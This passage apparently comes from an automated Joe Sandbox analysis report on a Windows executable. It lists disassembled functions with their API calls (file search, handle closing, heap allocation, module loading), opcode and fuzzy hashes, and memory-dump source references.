                                                                                  • Instruction Fuzzy Hash: ADD1FB6AB0868255FB68EB6595446B9E7E1FF05B84F8C40B5CB1D07BA1CF38E4628370
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1017591355-0
                                                                                  • Opcode ID: 388fc3c901f750e810fce68d2ec07def1b7a5bb75be5fb5e9f63537d100d501a
                                                                                  • Instruction ID: d6b9eccb9b4894162cb4602650e0c2eb8918c6c2dad3ba0acee72692c74a55b9
                                                                                  • Opcode Fuzzy Hash: 388fc3c901f750e810fce68d2ec07def1b7a5bb75be5fb5e9f63537d100d501a
                                                                                  • Instruction Fuzzy Hash: 8761D931E0C74B41FA64BAD594249BAD292AF45BD4F9C41B5EE4F067C5EE6CEC438230
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75AABE948: ReleaseSemaphore.KERNEL32 ref: 00007FF75AABE974
                                                                                    • Part of subcall function 00007FF75AABE948: CloseHandle.KERNELBASE ref: 00007FF75AABE993
                                                                                    • Part of subcall function 00007FF75AABE948: DeleteCriticalSection.KERNEL32 ref: 00007FF75AABE9AA
                                                                                    • Part of subcall function 00007FF75AABE948: CloseHandle.KERNEL32 ref: 00007FF75AABE9B7
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AAC1ACB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 904680172-0
                                                                                  • Opcode ID: 50f7335678577ceeb6d211ec326131ba5fa7e84c6b35c080be0a6a65b3549785
                                                                                  • Instruction ID: f38e922fcaf7e5bbae26fc0aafa55b559e7fdf1a699d33a86c1125496a28d5c4
                                                                                  • Opcode Fuzzy Hash: 50f7335678577ceeb6d211ec326131ba5fa7e84c6b35c080be0a6a65b3549785
                                                                                  • Instruction Fuzzy Hash: 7C61AD72B15A8592FE08EBA5D5644BCB3A4FF40F90F9C4272E76D07AC1DF28E4628310
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 9c3f9390a9065cb36f7a64368bb790d884637895af10fcd5f23bdc876ae0bee8
                                                                                  • Instruction ID: 1c93ca5130aebb71528294c468c55a8e20680599a5671f1d13da15aa34b519e9
                                                                                  • Opcode Fuzzy Hash: 9c3f9390a9065cb36f7a64368bb790d884637895af10fcd5f23bdc876ae0bee8
                                                                                  • Instruction Fuzzy Hash: C451F762A0878250FA20AB95D444BB9A791FF45BC4F8C0176EE5D07393DF3DE886C3A0
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75AAB3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF75AAC0811), ref: 00007FF75AAB3EFD
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AAAE993
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1011579015-0
                                                                                  • Opcode ID: 66b082697bf6d456d849a2ffc3f94eea7fcf4a782198a57a47dea411162543d7
                                                                                  • Instruction ID: 72192ae7d3d277d132af3684e2544c1e43a3bd1a8dded16508696edb8cbe6232
                                                                                  • Opcode Fuzzy Hash: 66b082697bf6d456d849a2ffc3f94eea7fcf4a782198a57a47dea411162543d7
                                                                                  • Instruction Fuzzy Hash: B6518622A0879681FB60EFA4D44577DA391FF84B84F884176EA8D077A6DF3DD442C360
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 596eeaa46c14c421b88cd5960f13ec5a4774242ca82f07c4e126378d4fcb3d87
                                                                                  • Instruction ID: a296634f2a25cdf62d4015d834e0ea75bfbae3bdb4f425b7ebb386524ed618b8
                                                                                  • Opcode Fuzzy Hash: 596eeaa46c14c421b88cd5960f13ec5a4774242ca82f07c4e126378d4fcb3d87
                                                                                  • Instruction Fuzzy Hash: 6141D762B18B8542FA14AA97A644779E291FF44FC0F8C8535EE4C47F5ADF3CD8928340
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 5a2d32e3cad0443ebeff1d9248599c1ca23f921f148fa2738b984a0d020eca18
                                                                                  • Instruction ID: c5ecd9d23ff6ceadc93d895aa2d1a727553436014adce31c16fe9e67e3c73b42
                                                                                  • Opcode Fuzzy Hash: 5a2d32e3cad0443ebeff1d9248599c1ca23f921f148fa2738b984a0d020eca18
                                                                                  • Instruction Fuzzy Hash: 99412722A08B4A80FE50AB65E145779A360EF84BD4F880175EA4D07BD9DF3DE842C730
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                  • String ID:
                                                                                  • API String ID: 3947729631-0
                                                                                  • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                  • Instruction ID: 05350263c13d2d3d1c9d0e08aa972438dbe8590cfd906a432967448677a14979
                                                                                  • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                  • Instruction Fuzzy Hash: 2341D421E1860282FB94BB91D850978E6A1BF58B40FCC44BADA8D476A1DF3CE842C760
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                  • String ID:
                                                                                  • API String ID: 680105476-0
                                                                                  • Opcode ID: 81bbc9496a7d415ea2bbbc601fb53a43020ae880daa92f7a292fdc8bc8c92929
                                                                                  • Instruction ID: a90d9fa95bfcbc78fc3e0ffcdae116c913c62db879a02ef0b9146772d4fa4c55
                                                                                  • Opcode Fuzzy Hash: 81bbc9496a7d415ea2bbbc601fb53a43020ae880daa92f7a292fdc8bc8c92929
                                                                                  • Instruction Fuzzy Hash: FF213022A08651A5FA54AE92A400679A2D0AF05BF0FDC0771DE7E47BD1DE7CE45283A4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                  • Instruction ID: 856c764ec21c1acc95cc4580b636220100b71c5020ed84aecb89100c7a0d139c
                                                                                  • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                  • Instruction Fuzzy Hash: 43115E3291C79286F710AB90A840D39F2E4FF60380FDD05B9E69D8B696DF3CE4428760
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: f5fcd5f1c3f2e37d131694daf467b35a295dcb205b70c803901a30fdf0723196
                                                                                  • Instruction ID: 44452455293f84ecf070e6fee9b1fced11d86f5b55318eb784cb0270b0548519
                                                                                  • Opcode Fuzzy Hash: f5fcd5f1c3f2e37d131694daf467b35a295dcb205b70c803901a30fdf0723196
                                                                                  • Instruction Fuzzy Hash: 10010466E1868541FA11A7A8E441629B3A2FF88790FC45271E6AC07AA5EF3CD0428724
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75AAD1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF75AAD1573,?,?,?,00007FF75AAD192A), ref: 00007FF75AAD162B
                                                                                  • DloadProtectSection.DELAYIMP ref: 00007FF75AAD15C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DloadHandleModuleProtectSection
                                                                                  • String ID:
                                                                                  • API String ID: 2883838935-0
                                                                                  • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                  • Instruction ID: e4d41f2f57342c6107e41df6567a471142b0756341b5b1a4051bd8bcfb71c45d
                                                                                  • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                  • Instruction Fuzzy Hash: 8111C070D0890781FB90BFC5E841F70A7A0BF14348FDC14F8DA4D862A1EE3CA69686B0
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75AAB40BC: FindFirstFileW.KERNELBASE ref: 00007FF75AAB410B
                                                                                    • Part of subcall function 00007FF75AAB40BC: FindFirstFileW.KERNELBASE ref: 00007FF75AAB415E
                                                                                    • Part of subcall function 00007FF75AAB40BC: GetLastError.KERNEL32 ref: 00007FF75AAB41AF
                                                                                  • FindClose.KERNELBASE(?,?,00000000,00007FF75AAC0811), ref: 00007FF75AAB3EFD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1464966427-0
                                                                                  • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                  • Instruction ID: 9ff4732097318e79c55d36bd8b50f5ef8e8eafdbbaf4bec29f790bffa155b658
                                                                                  • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                  • Instruction Fuzzy Hash: 4AF0F46250838582FA50BBF0A400579B7609F19BB4F5C53B8EA3D077CBCE38D8468770
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File
                                                                                  • String ID:
                                                                                  • API String ID: 749574446-0
                                                                                  • Opcode ID: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                  • Instruction ID: b7279b1e0c1dc5392b715a366b8ae6fca1e26b05ef58c7b9cc786515ef98d3ee
                                                                                  • Opcode Fuzzy Hash: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                  • Instruction Fuzzy Hash: 12E0CD51B1061582FF20BBB6C8419345320EF4CF84B8C10F1CE0D07331CE28C8C68714
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                  • Instruction ID: 4b7fbf55067a33e0274634f5e0f87a5efe4d9d768eae47df54d1d7822ae829ae
                                                                                  • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                  • Instruction Fuzzy Hash: 41D02212D0944082FD00B3B5D84147C6300AF93335FE803B1C23E81AE1CE1E98CBA320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 1611563598-0
                                                                                  • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                  • Instruction ID: 9cadecad84b7b197e99636b8bf41268ea423ac0cad0ef4c91ad34223400e4944
                                                                                  • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                  • Instruction Fuzzy Hash: CEC08C20F06602C1EA08EB26C8C941813A4BF54B04BA84078C10C81120CE2CC9FBD359
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap
                                                                                  • String ID:
                                                                                  • API String ID: 4292702814-0
                                                                                  • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                  • Instruction ID: 762504970d78d9704bc7fec2aee4f59f8bce5f60ee6fd034bed4b135fa8b4818
                                                                                  • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                  • Instruction Fuzzy Hash: 40F06251B0970745FE947AE19911BBAD2905F58B40FCC54B0C98D4E3E1EE1CE5834130
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
